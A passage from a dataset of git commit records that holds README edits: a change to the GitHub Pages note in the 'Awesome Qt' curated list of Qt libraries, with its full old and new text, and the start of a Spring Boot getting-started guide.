common behaviors\/commands for repl and editors more easily\n* 0.1.0 Initial release\n\n== License\nMIT, same as Light Table. See LICENSE.md for details.\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8f52925956214b11c5d9e9c37bb6e188d9e47f62","subject":"Change note about the Github Pages version","message":"Change note about the Github Pages version\n","repos":"insideqt\/awesome-qt","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Awesome Qt\n:icons: font\n:toc: preamble\n:toc-title:\n\n:AwesomeQt: https:\/\/insideqt.github.io\/awesome-qt\n\n:MIT: http:\/\/opensource.org\/licenses\/MIT[MIT license.]\n\nA curated list of links to awesome Qt-related libraries, tools, and other\nresources published under Free Software\/Open Source licenses.\n\nifdef::env-github[]\nNOTE: {AwesomeQt}[See this document in Github Pages] for a version with improved\nlegibility.\nendif::[]\n\nDon't forget to check http:\/\/doc.qt.io\/qt-5\/qtmodules.html[the list of essential\nand add-on modules from the Qt project] first! Upcoming modules might be in\n`qt-labs` or `playground` in http:\/\/code.qt.io\/[code.qt.io]. And remember that\nthere is https:\/\/github.com\/fffaraz\/awesome-cpp[Awesome C\/C++] for more projects\nthat don't use Qt.\n\n\n\n== Other registries \/ package managers\n\nThere are other projects that aim to provide not only an entry point to find\nother Qt libraries, but also a tool to download and configure them.\n\nhttp:\/\/inqlude.org\/::\nA large list of Qt libraries, categorized by maturity level and license. Is the\noldest and largest archive of Qt projects. A project from the\nhttp:\/\/www.kde.org[KDE] community.\n\nhttps:\/\/www.qpm.io\/::\nA package manager for Qt, from the http:\/\/www.cutehacks.com\/[Cutehacks]\ndevelopers. Is the youngest project, but features the best command line tool to\ninstall packages.\n\nhttp:\/\/www.qt-pods.org\/::\nInspired by the Cocoa pods project, a package manager with even a GUI interface\nbased on git submodules.\n\n\n\n== Libraries\n\n\n=== Databases\n\nhttps:\/\/github.com\/KDAB\/sqlate::\nCompile-time checked type-safe access to SQL databases using C++ templates.\nAllows you to get rid of string-based SQL queries in your Qt application.\n\n\n=== Event loop dispatchers\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_epoll::\nepoll-based event dispatcher\n\nhttps:\/\/github.com\/connectedtable\/qeventdispatcher_epoll::\nepoll event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libevent::\nlibevent-based event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libev::\nlibev-based event dispatcher\n\nhttps:\/\/github.com\/svalaskevicius\/qt-event-dispatcher-libuv::\nlibuv event dispatcher\n\n\n=== File formats\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/karchive\/html\/::\nProvides classes for easy reading, creation and manipulation of \"archive\"\nformats like ZIP and TAR. It also provides transparent compression and\ndecompression of data, like the GZip format, via a subclass of QIODevice.\n\nhttps:\/\/github.com\/flavio\/qjson::\nLibrary that maps JSON data to QVariant objects. Supports Qt 4.\n\nhttps:\/\/github.com\/gaudecker\/qt-json::\nA simple class for parsing JSON data into a QVariant hierarchy and vice versa.\nSupports Qt 4.\n\n\n=== Gaming\n\nhttps:\/\/github.com\/Bacon2D\/Bacon2D::\nFramework to ease 2D game development, providing ready-to-use QML elements\nrepresenting basic game entities needed by most of games. Starting with the\ntop-level Game container, which provides a game loop and Scene management, all\nthe way down to entities with Box2D physics and parallax layers with infinite\nscrolling.\n\nhttps:\/\/github.com\/qml-box2d\/qml-box2d::\nBox2D plugin for QML. The goal is to expose the functionality of Box2D as QML\ncomponents, in order to make it easy to write physics based games in QML.\n\nhttp:\/\/v-play.net\/::\nAllows easy cross-platform mobile game development for all major platforms\nincluding iOS, Android, BlackBerry.\n\n\n=== Graphics\n\nhttp:\/\/www.kdab.com\/kd-reports\/::\nLets you easily create printable reports by providing all of the necessary\nfeatures for a variety of applications. Reports can be created programmatically,\nusing an easy to use C++ API, or they can be data-driven, creating reports from\nXML or SQL data sources complete with watermarks, headers and footers. Reports\ncan be previewed manually, sent directly to a printer, or saved as PDF files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kimageformats\/html\/::\nProvides additional image format plugins for QtGui. Read support for: Gimp\n(xcf), OpenEXR (exr), Photoshop documents (psd), Sun Raster (ras). Write support\nfor: Encapsulated PostScript (eps), Personal Computer Exchange (pcx), SGI images\n(rgb, rgba, sgi, bw), Softimage PIC (pic), Targa (tga), XView (xv).\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kplotting\/html\/::\nA lightweight and easy to use plot widget.\n\/\/ TODO: Original description was pretty bad. I think this is the best I can say\n\/\/ right now, but help improving this is more than welcome.\n\nhttps:\/\/github.com\/gamecreature\/QtAwesome::\nLibrary for using http:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome] or\nother icon sets based on font files.\n\nhttp:\/\/qwt.sourceforge.net\/::\nQt Widgets for Technical Applications. Contains GUI Components and utility\nclasses which are primarily useful for programs with a technical background.\nBeside a framework for 2D plots it provides scales, sliders, dials, compasses,\nthermometers, wheels and knobs to control or display values, arrays, or ranges\nof type double.\n\n\n=== Hardware detection and interaction\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/bluez-qt\/html\/::\nBluezQt is a library for communication with the BlueZ system and session\ndaemons.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/solid\/html\/::\nA device integration framework. It provides a way of querying and\ninteracting with hardware independently of the underlying operating system.\nIt provides the following features for application developers: Hardware\nDiscovery, Power Management, and Network Management.\n\n\n=== Inter process communication\n\n\n=== Multimedia\n\nhttp:\/\/www.qtav.org\/::\nQtAV is a multimedia playback library based on Qt and FFmpeg. Supports Android,\niOS and desktops.\n\nhttps:\/\/vlc-qt.tano.si\/::\nContains core classes for main media playback and some GUI classes for faster\nmedia player developement.\n\n=== Network protocols and web services\n\nhttp:\/\/communi.github.io\/::\nA cross-platform IRC framework. Provides a set of tools for enabling IRC\nconnectivity in Qt-based C++ and QML applications.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kdnssd\/html\/::\nLibrary for handling the DNS-based Service Discovery Protocol (DNS-SD), the\nlayer of Zeroconf that allows network services, such as printers, to be\ndiscovered without any user intervention or centralized infrastructure.\n\nhttps:\/\/github.com\/wiedi\/libmaia::\nXML-RPC library.\n\nhttps:\/\/github.com\/Cutehacks\/qml-pusher:\nQML bindings for the Pusher.com service.\n\nhttps:\/\/github.com\/qxmpp-project\/qxmpp:\nXMPP client and server library. QXmpp strives to be as easy to use as possible:\nthe underlying TCP socket, the core XMPP RFCs (RFC3920 and RFC3921) and XMPP\nextensions have been nicely encapsulated into classes. QXmpp comes with full API\ndocumentation, automatic tests and many examples.\n\n\n=== Other programming languages\n\nhttps:\/\/github.com\/seanchas116\/libqmlbind::\nA C library for easily creating QML bindings for other languages by exporting\nobjects to QML. In use in `ruby-qml`.\n\nhttps:\/\/github.com\/trollixx\/node.qml::\nNode.js compatibility layer to QML applications. Potentially, QML applications\nshould be able to use majority of Node.js libraries.\n\nhttp:\/\/www.riverbankcomputing.com\/software\/pyqt\/::\nA set of Python 2 and Python 3 bindings for Qt and runs on all platforms\nsupported by Qt including Windows, OS X and Linux. PyQt5 supports Qt 5.\n\nhttp:\/\/thp.io\/2011\/pyotherside\/::\nAsynchronous Python 3 Bindings for Qt 5. This is a QML Plugin that provides\naccess to a Python 3 interpreter from QML.\n\nhttps:\/\/wiki.qt.io\/Category:LanguageBindings::PySide::\nProvides LGPL-licensed Python bindings for Qt. It also includes a complete\ntoolchain for rapidly generating bindings for any Qt-based C++ class\nhierarchy.\n\nhttp:\/\/sourceforge.net\/projects\/pythonqt\/::\nEmbeds Python in a Qt application, making classes based in `QObject` accessible\nto the scripted language language.\n\nhttps:\/\/github.com\/svalaskevicius\/qtjs-generator::\nQt API bindings generator for Node.js. Exposes the Qt API to JavaScript, running\nin an integrated event loop inside Node.js.\n\nhttp:\/\/seanchas116.github.io\/ruby-qml\/::\nBindings between Ruby and QML. Enables you to write Qt Quick GUIs in Ruby.\n\n\n=== Threading and asynchronous programming\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/threadweaver\/html\/::\nHelper for multithreaded programming. It uses a job-based interface to queue\ntasks and execute them in an efficient way. You simply divide the workload into\njobs, state the dependencies between the jobs and ThreadWeaver will work out the\nmost efficient way of dividing the work between threads within a set of resource\nlimits.\n\n\n=== User Interface\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kguiaddons\/html\/::\nUtilities for graphical user interfaces in the areas of colors, fonts, text,\nimages, keyboard input.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemmodels\/html\/::\nA set of extra item models for the model-view framework.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemviews\/html\/::\nIncludes a set of views, which can be used with item models. It includes views\nfor categorizing lists and to add search filters to flat and hierarchical lists.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kwidgetsaddons\/html\/::\nAction classes that can be added to toolbars or menus, a wide range of widgets\nfor selecting characters, fonts, colors, actions, dates and times, or MIME\ntypes, as well as platform-aware dialogs for configuration pages, message boxes,\nand password requests.\n\nhttps:\/\/github.com\/mikemcquaid\/Qocoa::\nWrappers for OS X Cocoa widgets. {MIT}\n\nhttps:\/\/github.com\/shadone\/qtmacgoodies::\nAdditional widgets\/objects to make applications look more native on Mac OS X,\nlike `MacPreferencesWindow`, `MacStandardIcon` or `MacWindow`.\n\nhttps:\/\/github.com\/cybercatalyst\/qtsystemtrayiconmac::\nExtended QSystemTrayIcon for Mac OS X.\n\n\n=== Web frameworks\n\nhttp:\/\/cutelyst.org\/::\nMVC web framework inspired in Perl's Catalyst.\n\nhttps:\/\/github.com\/jlaine\/qdjango\/::\nQDjango is a web framework written in C++ and built on top of the Qt library.\nWhere possible it tries to follow django's API, hence its name.\n\nhttp:\/\/www.treefrogframework.org\/::\nHigh-speed and full-stack web application framework based on C++ and Qt, which\nsupports HTTP and WebSocket protocol. Web applications can run faster than that\nof lightweight programming language. In application development, it provides an\nO\/R mapping system and template system on an MVC architecture, aims to achieve\nhigh productivity through the policy of convention over configuration.\n\nhttps:\/\/github.com\/vinipsmaker\/tufao::\nTuf\u00e3o is a web framework for C++ that makes use of Qt's object communication\nsystem (signals & slots).\n\n\n=== Miscellany\n\nhttps:\/\/github.com\/sergey-shambir\/breakpad-qt::\nCross-platform crash handler, implemented as wrapper around google-breakpad.\n\nhttps:\/\/github.com\/dschmidt\/libcrashreporter-qt::\nProvides an easy integration of Google Breakpad crash reporting into a Qt\napplication.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kconfig\/html\/::\nProvides an advanced configuration system. The core provides access to the\nfiles, with a code generation system to have type safe access to the\nconfiguration, which features cascading files (global versus local), shell\nexpansion, and locking down options. The GUI provides a way to hook widgets to\nthe configuration so that they are automatically initialized from the\nconfiguration and automatically propagate their changes to their respective\nconfiguration files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kcoreaddons\/html\/::\nSupport classes for manipulating mime types, autosaving files, creating backup\nfiles, generating random sequences, performing text manipulations such as macro\nreplacement, accessing user information and more.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/ki18n\/html\/::\nProvides functionality for internationalizing user interface text in\napplications, based on the GNU Gettext translation system. It wraps the standard\nGettext functionality, so that the programmers and translators can use the\nfamiliar Gettext tools and workflows. KI18n provides additional functionality:\nargument capturing, customizable markup, and translation scripting.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kidletime\/html\/::\nReports information on idle time. It is useful not only for finding out about\nthe current idle time of the PC, but also for getting notified upon idle time\nevents, such as custom timeouts, or user activity\n\nhttps:\/\/github.com\/Roxee\/qt-roxeemegaup\/::\nWrapper around Sparkle and WinSparkle.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeeplatipus::\nA collection of helpers and additional functionalities for Qt (media key\nsupport, OS X remote control, fullscreen native window hack).\n\nhttps:\/\/github.com\/Roxee\/qt-roxeesinapp::\nAn up to date QtSingleApplication fork.\n\nhttps:\/\/github.com\/VerbalExpressions\/QtVerbalExpressions::\nRegular Expressions made easy. Match and replace in strings with an easy to use\nAPI.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/sonnet\/html\/::\nPlugin-based spell checking library for Qt-based applications. It supports\nseveral different plugins, including HSpell, Enchant, ASpell and HUNSPELL. It\nalso supports automated language detection, based on a combination of different\nalgorithms.\n\n\n== Tools\n\nhttps:\/\/github.com\/sletta\/dqml::\nA simple live coding environment for QML. It will track the directory where a\nQML file is located and continuously update the view where it is located.\nSupports pushing files to a remote system which will reload the received files.\n\nhttps:\/\/github.com\/KDAB\/GammaRay::\nGammaRay is a tool to poke around in a Qt-application and also to manipulate the\napplication to some extent.\n\nhttps:\/\/github.com\/Pelagicore\/qmllive::\nA live coding environment for QML. Allows to reload your QML view when a file in\nyour project changes. This can be done on the same device using the QmlLiveBench\nor on a remote device using the QmlLiveRuntime.\n\nhttps:\/\/github.com\/robertknight\/Qt-Inspector::\nUtility to browse the Qt object tree of a running Qt application and edit object\nproperties on the fly\n\n\n\n== Off topic\n\nNOTE: Stuff that might not integrate at all with Qt's types, API, event loop,\netc., but still an application built with Qt can leverage it well enough because\nit is cross platform native code that fulfills a common use case of the typical\nQt applications.\n\nhttps:\/\/github.com\/Mendeley\/breakpad::\nThis is a fork of Google Breakpad, a multi-platform crash reporting system,\nwhich is used by Mendeley Desktop under Windows, Mac and Linux.\n\nhttps:\/\/github.com\/Mendeley\/Update-Installer::\nSmall cross-platform software update installer.\n","old_contents":"= Awesome Qt\n:icons: font\n:toc: preamble\n:toc-title:\n\n:AwesomeQt: https:\/\/insideqt.github.io\/awesome-qt\n\n:MIT: http:\/\/opensource.org\/licenses\/MIT[MIT license.]\n\nA curated list of links to awesome Qt-related libraries, tools, and other\nresources published under Free Software\/Open Source licenses.\n\nifdef::env-github[]\nNOTE: This list is {AwesomeQt}[also available in Github Pages] with an improved\nrendering for better legibility.\nendif::[]\n\nDon't forget to check http:\/\/doc.qt.io\/qt-5\/qtmodules.html[the list of essential\nand add-on modules from the Qt project] first! Upcoming modules might be in\n`qt-labs` or `playground` in http:\/\/code.qt.io\/[code.qt.io]. And remember that\nthere is https:\/\/github.com\/fffaraz\/awesome-cpp[Awesome C\/C++] for more projects\nthat don't use Qt.\n\n\n\n== Other registries \/ package managers\n\nThere are other projects that aim to provide not only an entry point to find\nother Qt libraries, but also a tool to download and configure them.\n\nhttp:\/\/inqlude.org\/::\nA large list of Qt libraries, categorized by maturity level and license. Is the\noldest and largest archive of Qt projects. A project from the\nhttp:\/\/www.kde.org[KDE] community.\n\nhttps:\/\/www.qpm.io\/::\nA package manager for Qt, from the http:\/\/www.cutehacks.com\/[Cutehacks]\ndevelopers. Is the youngest project, but features the best command line tool to\ninstall packages.\n\nhttp:\/\/www.qt-pods.org\/::\nInspired by the Cocoa pods project, a package manager with even a GUI interface\nbased on git submodules.\n\n\n\n== Libraries\n\n\n=== Databases\n\nhttps:\/\/github.com\/KDAB\/sqlate::\nCompile-time checked type-safe access to SQL databases using C++ templates.\nAllows you to get rid of string-based SQL queries in your Qt application.\n\n\n=== Event loop dispatchers\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_epoll::\nepoll-based event dispatcher\n\nhttps:\/\/github.com\/connectedtable\/qeventdispatcher_epoll::\nepoll event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libevent::\nlibevent-based event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libev::\nlibev-based event dispatcher\n\nhttps:\/\/github.com\/svalaskevicius\/qt-event-dispatcher-libuv::\nlibuv event dispatcher\n\n\n=== File formats\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/karchive\/html\/::\nProvides classes for easy reading, creation and manipulation of \"archive\"\nformats like ZIP and TAR. It also provides transparent compression and\ndecompression of data, like the GZip format, via a subclass of QIODevice.\n\nhttps:\/\/github.com\/flavio\/qjson::\nLibrary that maps JSON data to QVariant objects. Supports Qt 4.\n\nhttps:\/\/github.com\/gaudecker\/qt-json::\nA simple class for parsing JSON data into a QVariant hierarchy and vice versa.\nSupports Qt 4.\n\n\n=== Gaming\n\nhttps:\/\/github.com\/Bacon2D\/Bacon2D::\nFramework to ease 2D game development, providing ready-to-use QML elements\nrepresenting basic game entities needed by most of games. Starting with the\ntop-level Game container, which provides a game loop and Scene management, all\nthe way down to entities with Box2D physics and parallax layers with infinite\nscrolling.\n\nhttps:\/\/github.com\/qml-box2d\/qml-box2d::\nBox2D plugin for QML. The goal is to expose the functionality of Box2D as QML\ncomponents, in order to make it easy to write physics based games in QML.\n\nhttp:\/\/v-play.net\/::\nAllows easy cross-platform mobile game development for all major platforms\nincluding iOS, Android, BlackBerry.\n\n\n=== Graphics\n\nhttp:\/\/www.kdab.com\/kd-reports\/::\nLets you easily create printable reports by providing all of the necessary\nfeatures for a variety of applications. Reports can be created programmatically,\nusing an easy to use C++ API, or they can be data-driven, creating reports from\nXML or SQL data sources complete with watermarks, headers and footers. Reports\ncan be previewed manually, sent directly to a printer, or saved as PDF files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kimageformats\/html\/::\nProvides additional image format plugins for QtGui. Read support for: Gimp\n(xcf), OpenEXR (exr), Photoshop documents (psd), Sun Raster (ras). Write support\nfor: Encapsulated PostScript (eps), Personal Computer Exchange (pcx), SGI images\n(rgb, rgba, sgi, bw), Softimage PIC (pic), Targa (tga), XView (xv).\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kplotting\/html\/::\nA lightweight and easy to use plot widget.\n\/\/ TODO: Original description was pretty bad. I think this is the best I can say\n\/\/ right now, but help improving this is more than welcome.\n\nhttps:\/\/github.com\/gamecreature\/QtAwesome::\nLibrary for using http:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome] or\nother icon sets based on font files.\n\nhttp:\/\/qwt.sourceforge.net\/::\nQt Widgets for Technical Applications. Contains GUI Components and utility\nclasses which are primarily useful for programs with a technical background.\nBeside a framework for 2D plots it provides scales, sliders, dials, compasses,\nthermometers, wheels and knobs to control or display values, arrays, or ranges\nof type double.\n\n\n=== Hardware detection and interaction\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/bluez-qt\/html\/::\nBluezQt is a library for communication with the BlueZ system and session\ndaemons.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/solid\/html\/::\nA device integration framework. It provides a way of querying and\ninteracting with hardware independently of the underlying operating system.\nIt provides the following features for application developers: Hardware\nDiscovery, Power Management, and Network Management.\n\n\n=== Inter process communication\n\n\n=== Multimedia\n\nhttp:\/\/www.qtav.org\/::\nQtAV is a multimedia playback library based on Qt and FFmpeg. Supports Android,\niOS and desktops.\n\nhttps:\/\/vlc-qt.tano.si\/::\nContains core classes for main media playback and some GUI classes for faster\nmedia player developement.\n\n=== Network protocols and web services\n\nhttp:\/\/communi.github.io\/::\nA cross-platform IRC framework. Provides a set of tools for enabling IRC\nconnectivity in Qt-based C++ and QML applications.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kdnssd\/html\/::\nLibrary for handling the DNS-based Service Discovery Protocol (DNS-SD), the\nlayer of Zeroconf that allows network services, such as printers, to be\ndiscovered without any user intervention or centralized infrastructure.\n\nhttps:\/\/github.com\/wiedi\/libmaia::\nXML-RPC library.\n\nhttps:\/\/github.com\/Cutehacks\/qml-pusher:\nQML bindings for the Pusher.com service.\n\nhttps:\/\/github.com\/qxmpp-project\/qxmpp:\nXMPP client and server library. QXmpp strives to be as easy to use as possible:\nthe underlying TCP socket, the core XMPP RFCs (RFC3920 and RFC3921) and XMPP\nextensions have been nicely encapsulated into classes. QXmpp comes with full API\ndocumentation, automatic tests and many examples.\n\n\n=== Other programming languages\n\nhttps:\/\/github.com\/seanchas116\/libqmlbind::\nA C library for easily creating QML bindings for other languages by exporting\nobjects to QML. In use in `ruby-qml`.\n\nhttps:\/\/github.com\/trollixx\/node.qml::\nNode.js compatibility layer to QML applications. Potentially, QML applications\nshould be able to use majority of Node.js libraries.\n\nhttp:\/\/www.riverbankcomputing.com\/software\/pyqt\/::\nA set of Python 2 and Python 3 bindings for Qt and runs on all platforms\nsupported by Qt including Windows, OS X and Linux. PyQt5 supports Qt 5.\n\nhttp:\/\/thp.io\/2011\/pyotherside\/::\nAsynchronous Python 3 Bindings for Qt 5. This is a QML Plugin that provides\naccess to a Python 3 interpreter from QML.\n\nhttps:\/\/wiki.qt.io\/Category:LanguageBindings::PySide::\nProvides LGPL-licensed Python bindings for Qt. It also includes a complete\ntoolchain for rapidly generating bindings for any Qt-based C++ class\nhierarchy.\n\nhttp:\/\/sourceforge.net\/projects\/pythonqt\/::\nEmbeds Python in a Qt application, making classes based in `QObject` accessible\nto the scripted language language.\n\nhttps:\/\/github.com\/svalaskevicius\/qtjs-generator::\nQt API bindings generator for Node.js. Exposes the Qt API to JavaScript, running\nin an integrated event loop inside Node.js.\n\nhttp:\/\/seanchas116.github.io\/ruby-qml\/::\nBindings between Ruby and QML. Enables you to write Qt Quick GUIs in Ruby.\n\n\n=== Threading and asynchronous programming\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/threadweaver\/html\/::\nHelper for multithreaded programming. It uses a job-based interface to queue\ntasks and execute them in an efficient way. You simply divide the workload into\njobs, state the dependencies between the jobs and ThreadWeaver will work out the\nmost efficient way of dividing the work between threads within a set of resource\nlimits.\n\n\n=== User Interface\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kguiaddons\/html\/::\nUtilities for graphical user interfaces in the areas of colors, fonts, text,\nimages, keyboard input.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemmodels\/html\/::\nA set of extra item models for the model-view framework.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemviews\/html\/::\nIncludes a set of views, which can be used with item models. It includes views\nfor categorizing lists and to add search filters to flat and hierarchical lists.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kwidgetsaddons\/html\/::\nAction classes that can be added to toolbars or menus, a wide range of widgets\nfor selecting characters, fonts, colors, actions, dates and times, or MIME\ntypes, as well as platform-aware dialogs for configuration pages, message boxes,\nand password requests.\n\nhttps:\/\/github.com\/mikemcquaid\/Qocoa::\nWrappers for OS X Cocoa widgets. {MIT}\n\nhttps:\/\/github.com\/shadone\/qtmacgoodies::\nAdditional widgets\/objects to make applications look more native on Mac OS X,\nlike `MacPreferencesWindow`, `MacStandardIcon` or `MacWindow`.\n\nhttps:\/\/github.com\/cybercatalyst\/qtsystemtrayiconmac::\nExtended QSystemTrayIcon for Mac OS X.\n\n\n=== Web frameworks\n\nhttp:\/\/cutelyst.org\/::\nMVC web framework inspired in Perl's Catalyst.\n\nhttps:\/\/github.com\/jlaine\/qdjango\/::\nQDjango is a web framework written in C++ and built on top of the Qt library.\nWhere possible it tries to follow django's API, hence its name.\n\nhttp:\/\/www.treefrogframework.org\/::\nHigh-speed and full-stack web application framework based on C++ and Qt, which\nsupports HTTP and WebSocket protocol. Web applications can run faster than that\nof lightweight programming language. In application development, it provides an\nO\/R mapping system and template system on an MVC architecture, aims to achieve\nhigh productivity through the policy of convention over configuration.\n\nhttps:\/\/github.com\/vinipsmaker\/tufao::\nTuf\u00e3o is a web framework for C++ that makes use of Qt's object communication\nsystem (signals & slots).\n\n\n=== Miscellany\n\nhttps:\/\/github.com\/sergey-shambir\/breakpad-qt::\nCross-platform crash handler, implemented as wrapper around google-breakpad.\n\nhttps:\/\/github.com\/dschmidt\/libcrashreporter-qt::\nProvides an easy integration of Google Breakpad crash reporting into a Qt\napplication.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kconfig\/html\/::\nProvides an advanced configuration system. The core provides access to the\nfiles, with a code generation system to have type safe access to the\nconfiguration, which features cascading files (global versus local), shell\nexpansion, and locking down options. The GUI provides a way to hook widgets to\nthe configuration so that they are automatically initialized from the\nconfiguration and automatically propagate their changes to their respective\nconfiguration files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kcoreaddons\/html\/::\nSupport classes for manipulating mime types, autosaving files, creating backup\nfiles, generating random sequences, performing text manipulations such as macro\nreplacement, accessing user information and more.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/ki18n\/html\/::\nProvides functionality for internationalizing user interface text in\napplications, based on the GNU Gettext translation system. It wraps the standard\nGettext functionality, so that the programmers and translators can use the\nfamiliar Gettext tools and workflows. KI18n provides additional functionality:\nargument capturing, customizable markup, and translation scripting.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kidletime\/html\/::\nReports information on idle time. It is useful not only for finding out about\nthe current idle time of the PC, but also for getting notified upon idle time\nevents, such as custom timeouts, or user activity\n\nhttps:\/\/github.com\/Roxee\/qt-roxeemegaup\/::\nWrapper around Sparkle and WinSparkle.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeeplatipus::\nA collection of helpers and additional functionalities for Qt (media key\nsupport, OS X remote control, fullscreen native window hack).\n\nhttps:\/\/github.com\/Roxee\/qt-roxeesinapp::\nAn up to date QtSingleApplication fork.\n\nhttps:\/\/github.com\/VerbalExpressions\/QtVerbalExpressions::\nRegular Expressions made easy. Match and replace in strings with an easy to use\nAPI.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/sonnet\/html\/::\nPlugin-based spell checking library for Qt-based applications. It supports\nseveral different plugins, including HSpell, Enchant, ASpell and HUNSPELL. It\nalso supports automated language detection, based on a combination of different\nalgorithms.\n\n\n== Tools\n\nhttps:\/\/github.com\/sletta\/dqml::\nA simple live coding environment for QML. It will track the directory where a\nQML file is located and continuously update the view where it is located.\nSupports pushing files to a remote system which will reload the received files.\n\nhttps:\/\/github.com\/KDAB\/GammaRay::\nGammaRay is a tool to poke around in a Qt-application and also to manipulate the\napplication to some extent.\n\nhttps:\/\/github.com\/Pelagicore\/qmllive::\nA live coding environment for QML. Allows to reload your QML view when a file in\nyour project changes. This can be done on the same device using the QmlLiveBench\nor on a remote device using the QmlLiveRuntime.\n\nhttps:\/\/github.com\/robertknight\/Qt-Inspector::\nUtility to browse the Qt object tree of a running Qt application and edit object\nproperties on the fly\n\n\n\n== Off topic\n\nNOTE: Stuff that might not integrate at all with Qt's types, API, event loop,\netc., but still an application built with Qt can leverage it well enough because\nit is cross platform native code that fulfills a common use case of the typical\nQt applications.\n\nhttps:\/\/github.com\/Mendeley\/breakpad::\nThis is a fork of Google Breakpad, a multi-platform crash reporting system,\nwhich is used by Mendeley Desktop under Windows, Mac and Linux.\n\nhttps:\/\/github.com\/Mendeley\/Update-Installer::\nSmall cross-platform software update installer.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"52680f02b7e4dd9756f5cd6b7d3a41495fbfbafc","subject":"Update README.adoc","message":"Update README.adoc\n\nFix typo","repos":"loosebazooka\/simple-spring-boot-appengine-app","old_file":"README.adoc","new_file":"README.adoc","new_contents":":spring_boot_version: 0.5.0.M6\n:spring-boot: https:\/\/github.com\/spring-projects\/spring-boot\n:toc:\n:icons: font\n:source-highlighter: prettify\n:project_id: gs-spring-boot\nThis guide provides a sampling of how {spring-boot}[Spring Boot] helps you accelerate and facilitate application development. As you read more Spring Getting Started guides, you will see more use cases for Spring Boot.\nIt is meant to give you a quick taste of Spring Boot. If you want to create your own Spring Boot-based project, visit \nhttp:\/\/start.spring.io\/[Spring Initializr], fill in your project details, pick your options, and you can download either\na Maven build file, or a bundled up project as a zip file.\n\n== What you'll build\nYou'll build a simple web application with Spring Boot and add some useful services to it.\n\n== What you'll need\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/prereq_editor_jdk_buildtools.adoc[]\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/how_to_complete_this_guide.adoc[]\n\n\n[[scratch]]\n== Set up the project\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/build_system_intro.adoc[]\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/create_directory_structure_hello.adoc[]\n\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/create_both_builds.adoc[]\n\n`build.gradle`\n\/\/ AsciiDoc source formatting doesn't support groovy, so using java instead\n[source,java]\n----\ninclude::initial\/build.gradle[]\n----\n\n== Learn what you can do with Spring Boot\n\nSpring Boot offers a fast way to build applications. It looks at your classpath and at beans you have configured, makes reasonable assumptions about what you're missing, and adds it. With Spring Boot you can focus more on business features and less on infrastructure.\n\nFor example:\n\n- Got Spring MVC? There are several specific beans you almost always need, and Spring Boot adds them automatically. A Spring MVC app also needs a servlet container, so Spring Boot automatically configures embedded Tomcat.\n- Got Jetty? If so, you probably do NOT want Tomcat, but instead embedded Jetty. Spring Boot handles that for you.\n- Got Thymeleaf? There are a few beans that must always be added to your application context; Spring Boot adds them for you.\n\nThese are just a few examples of the automatic configuration Spring Boot provides. At the same time, Spring Boot doesn't get in your way. For example, if Thymeleaf is on your path, Spring Boot adds a `SpringTemplateEngine` to your application context automatically. But if you define your own `SpringTemplateEngine` with your own settings, then Spring Boot won't add one. This leaves you in control with little effort on your 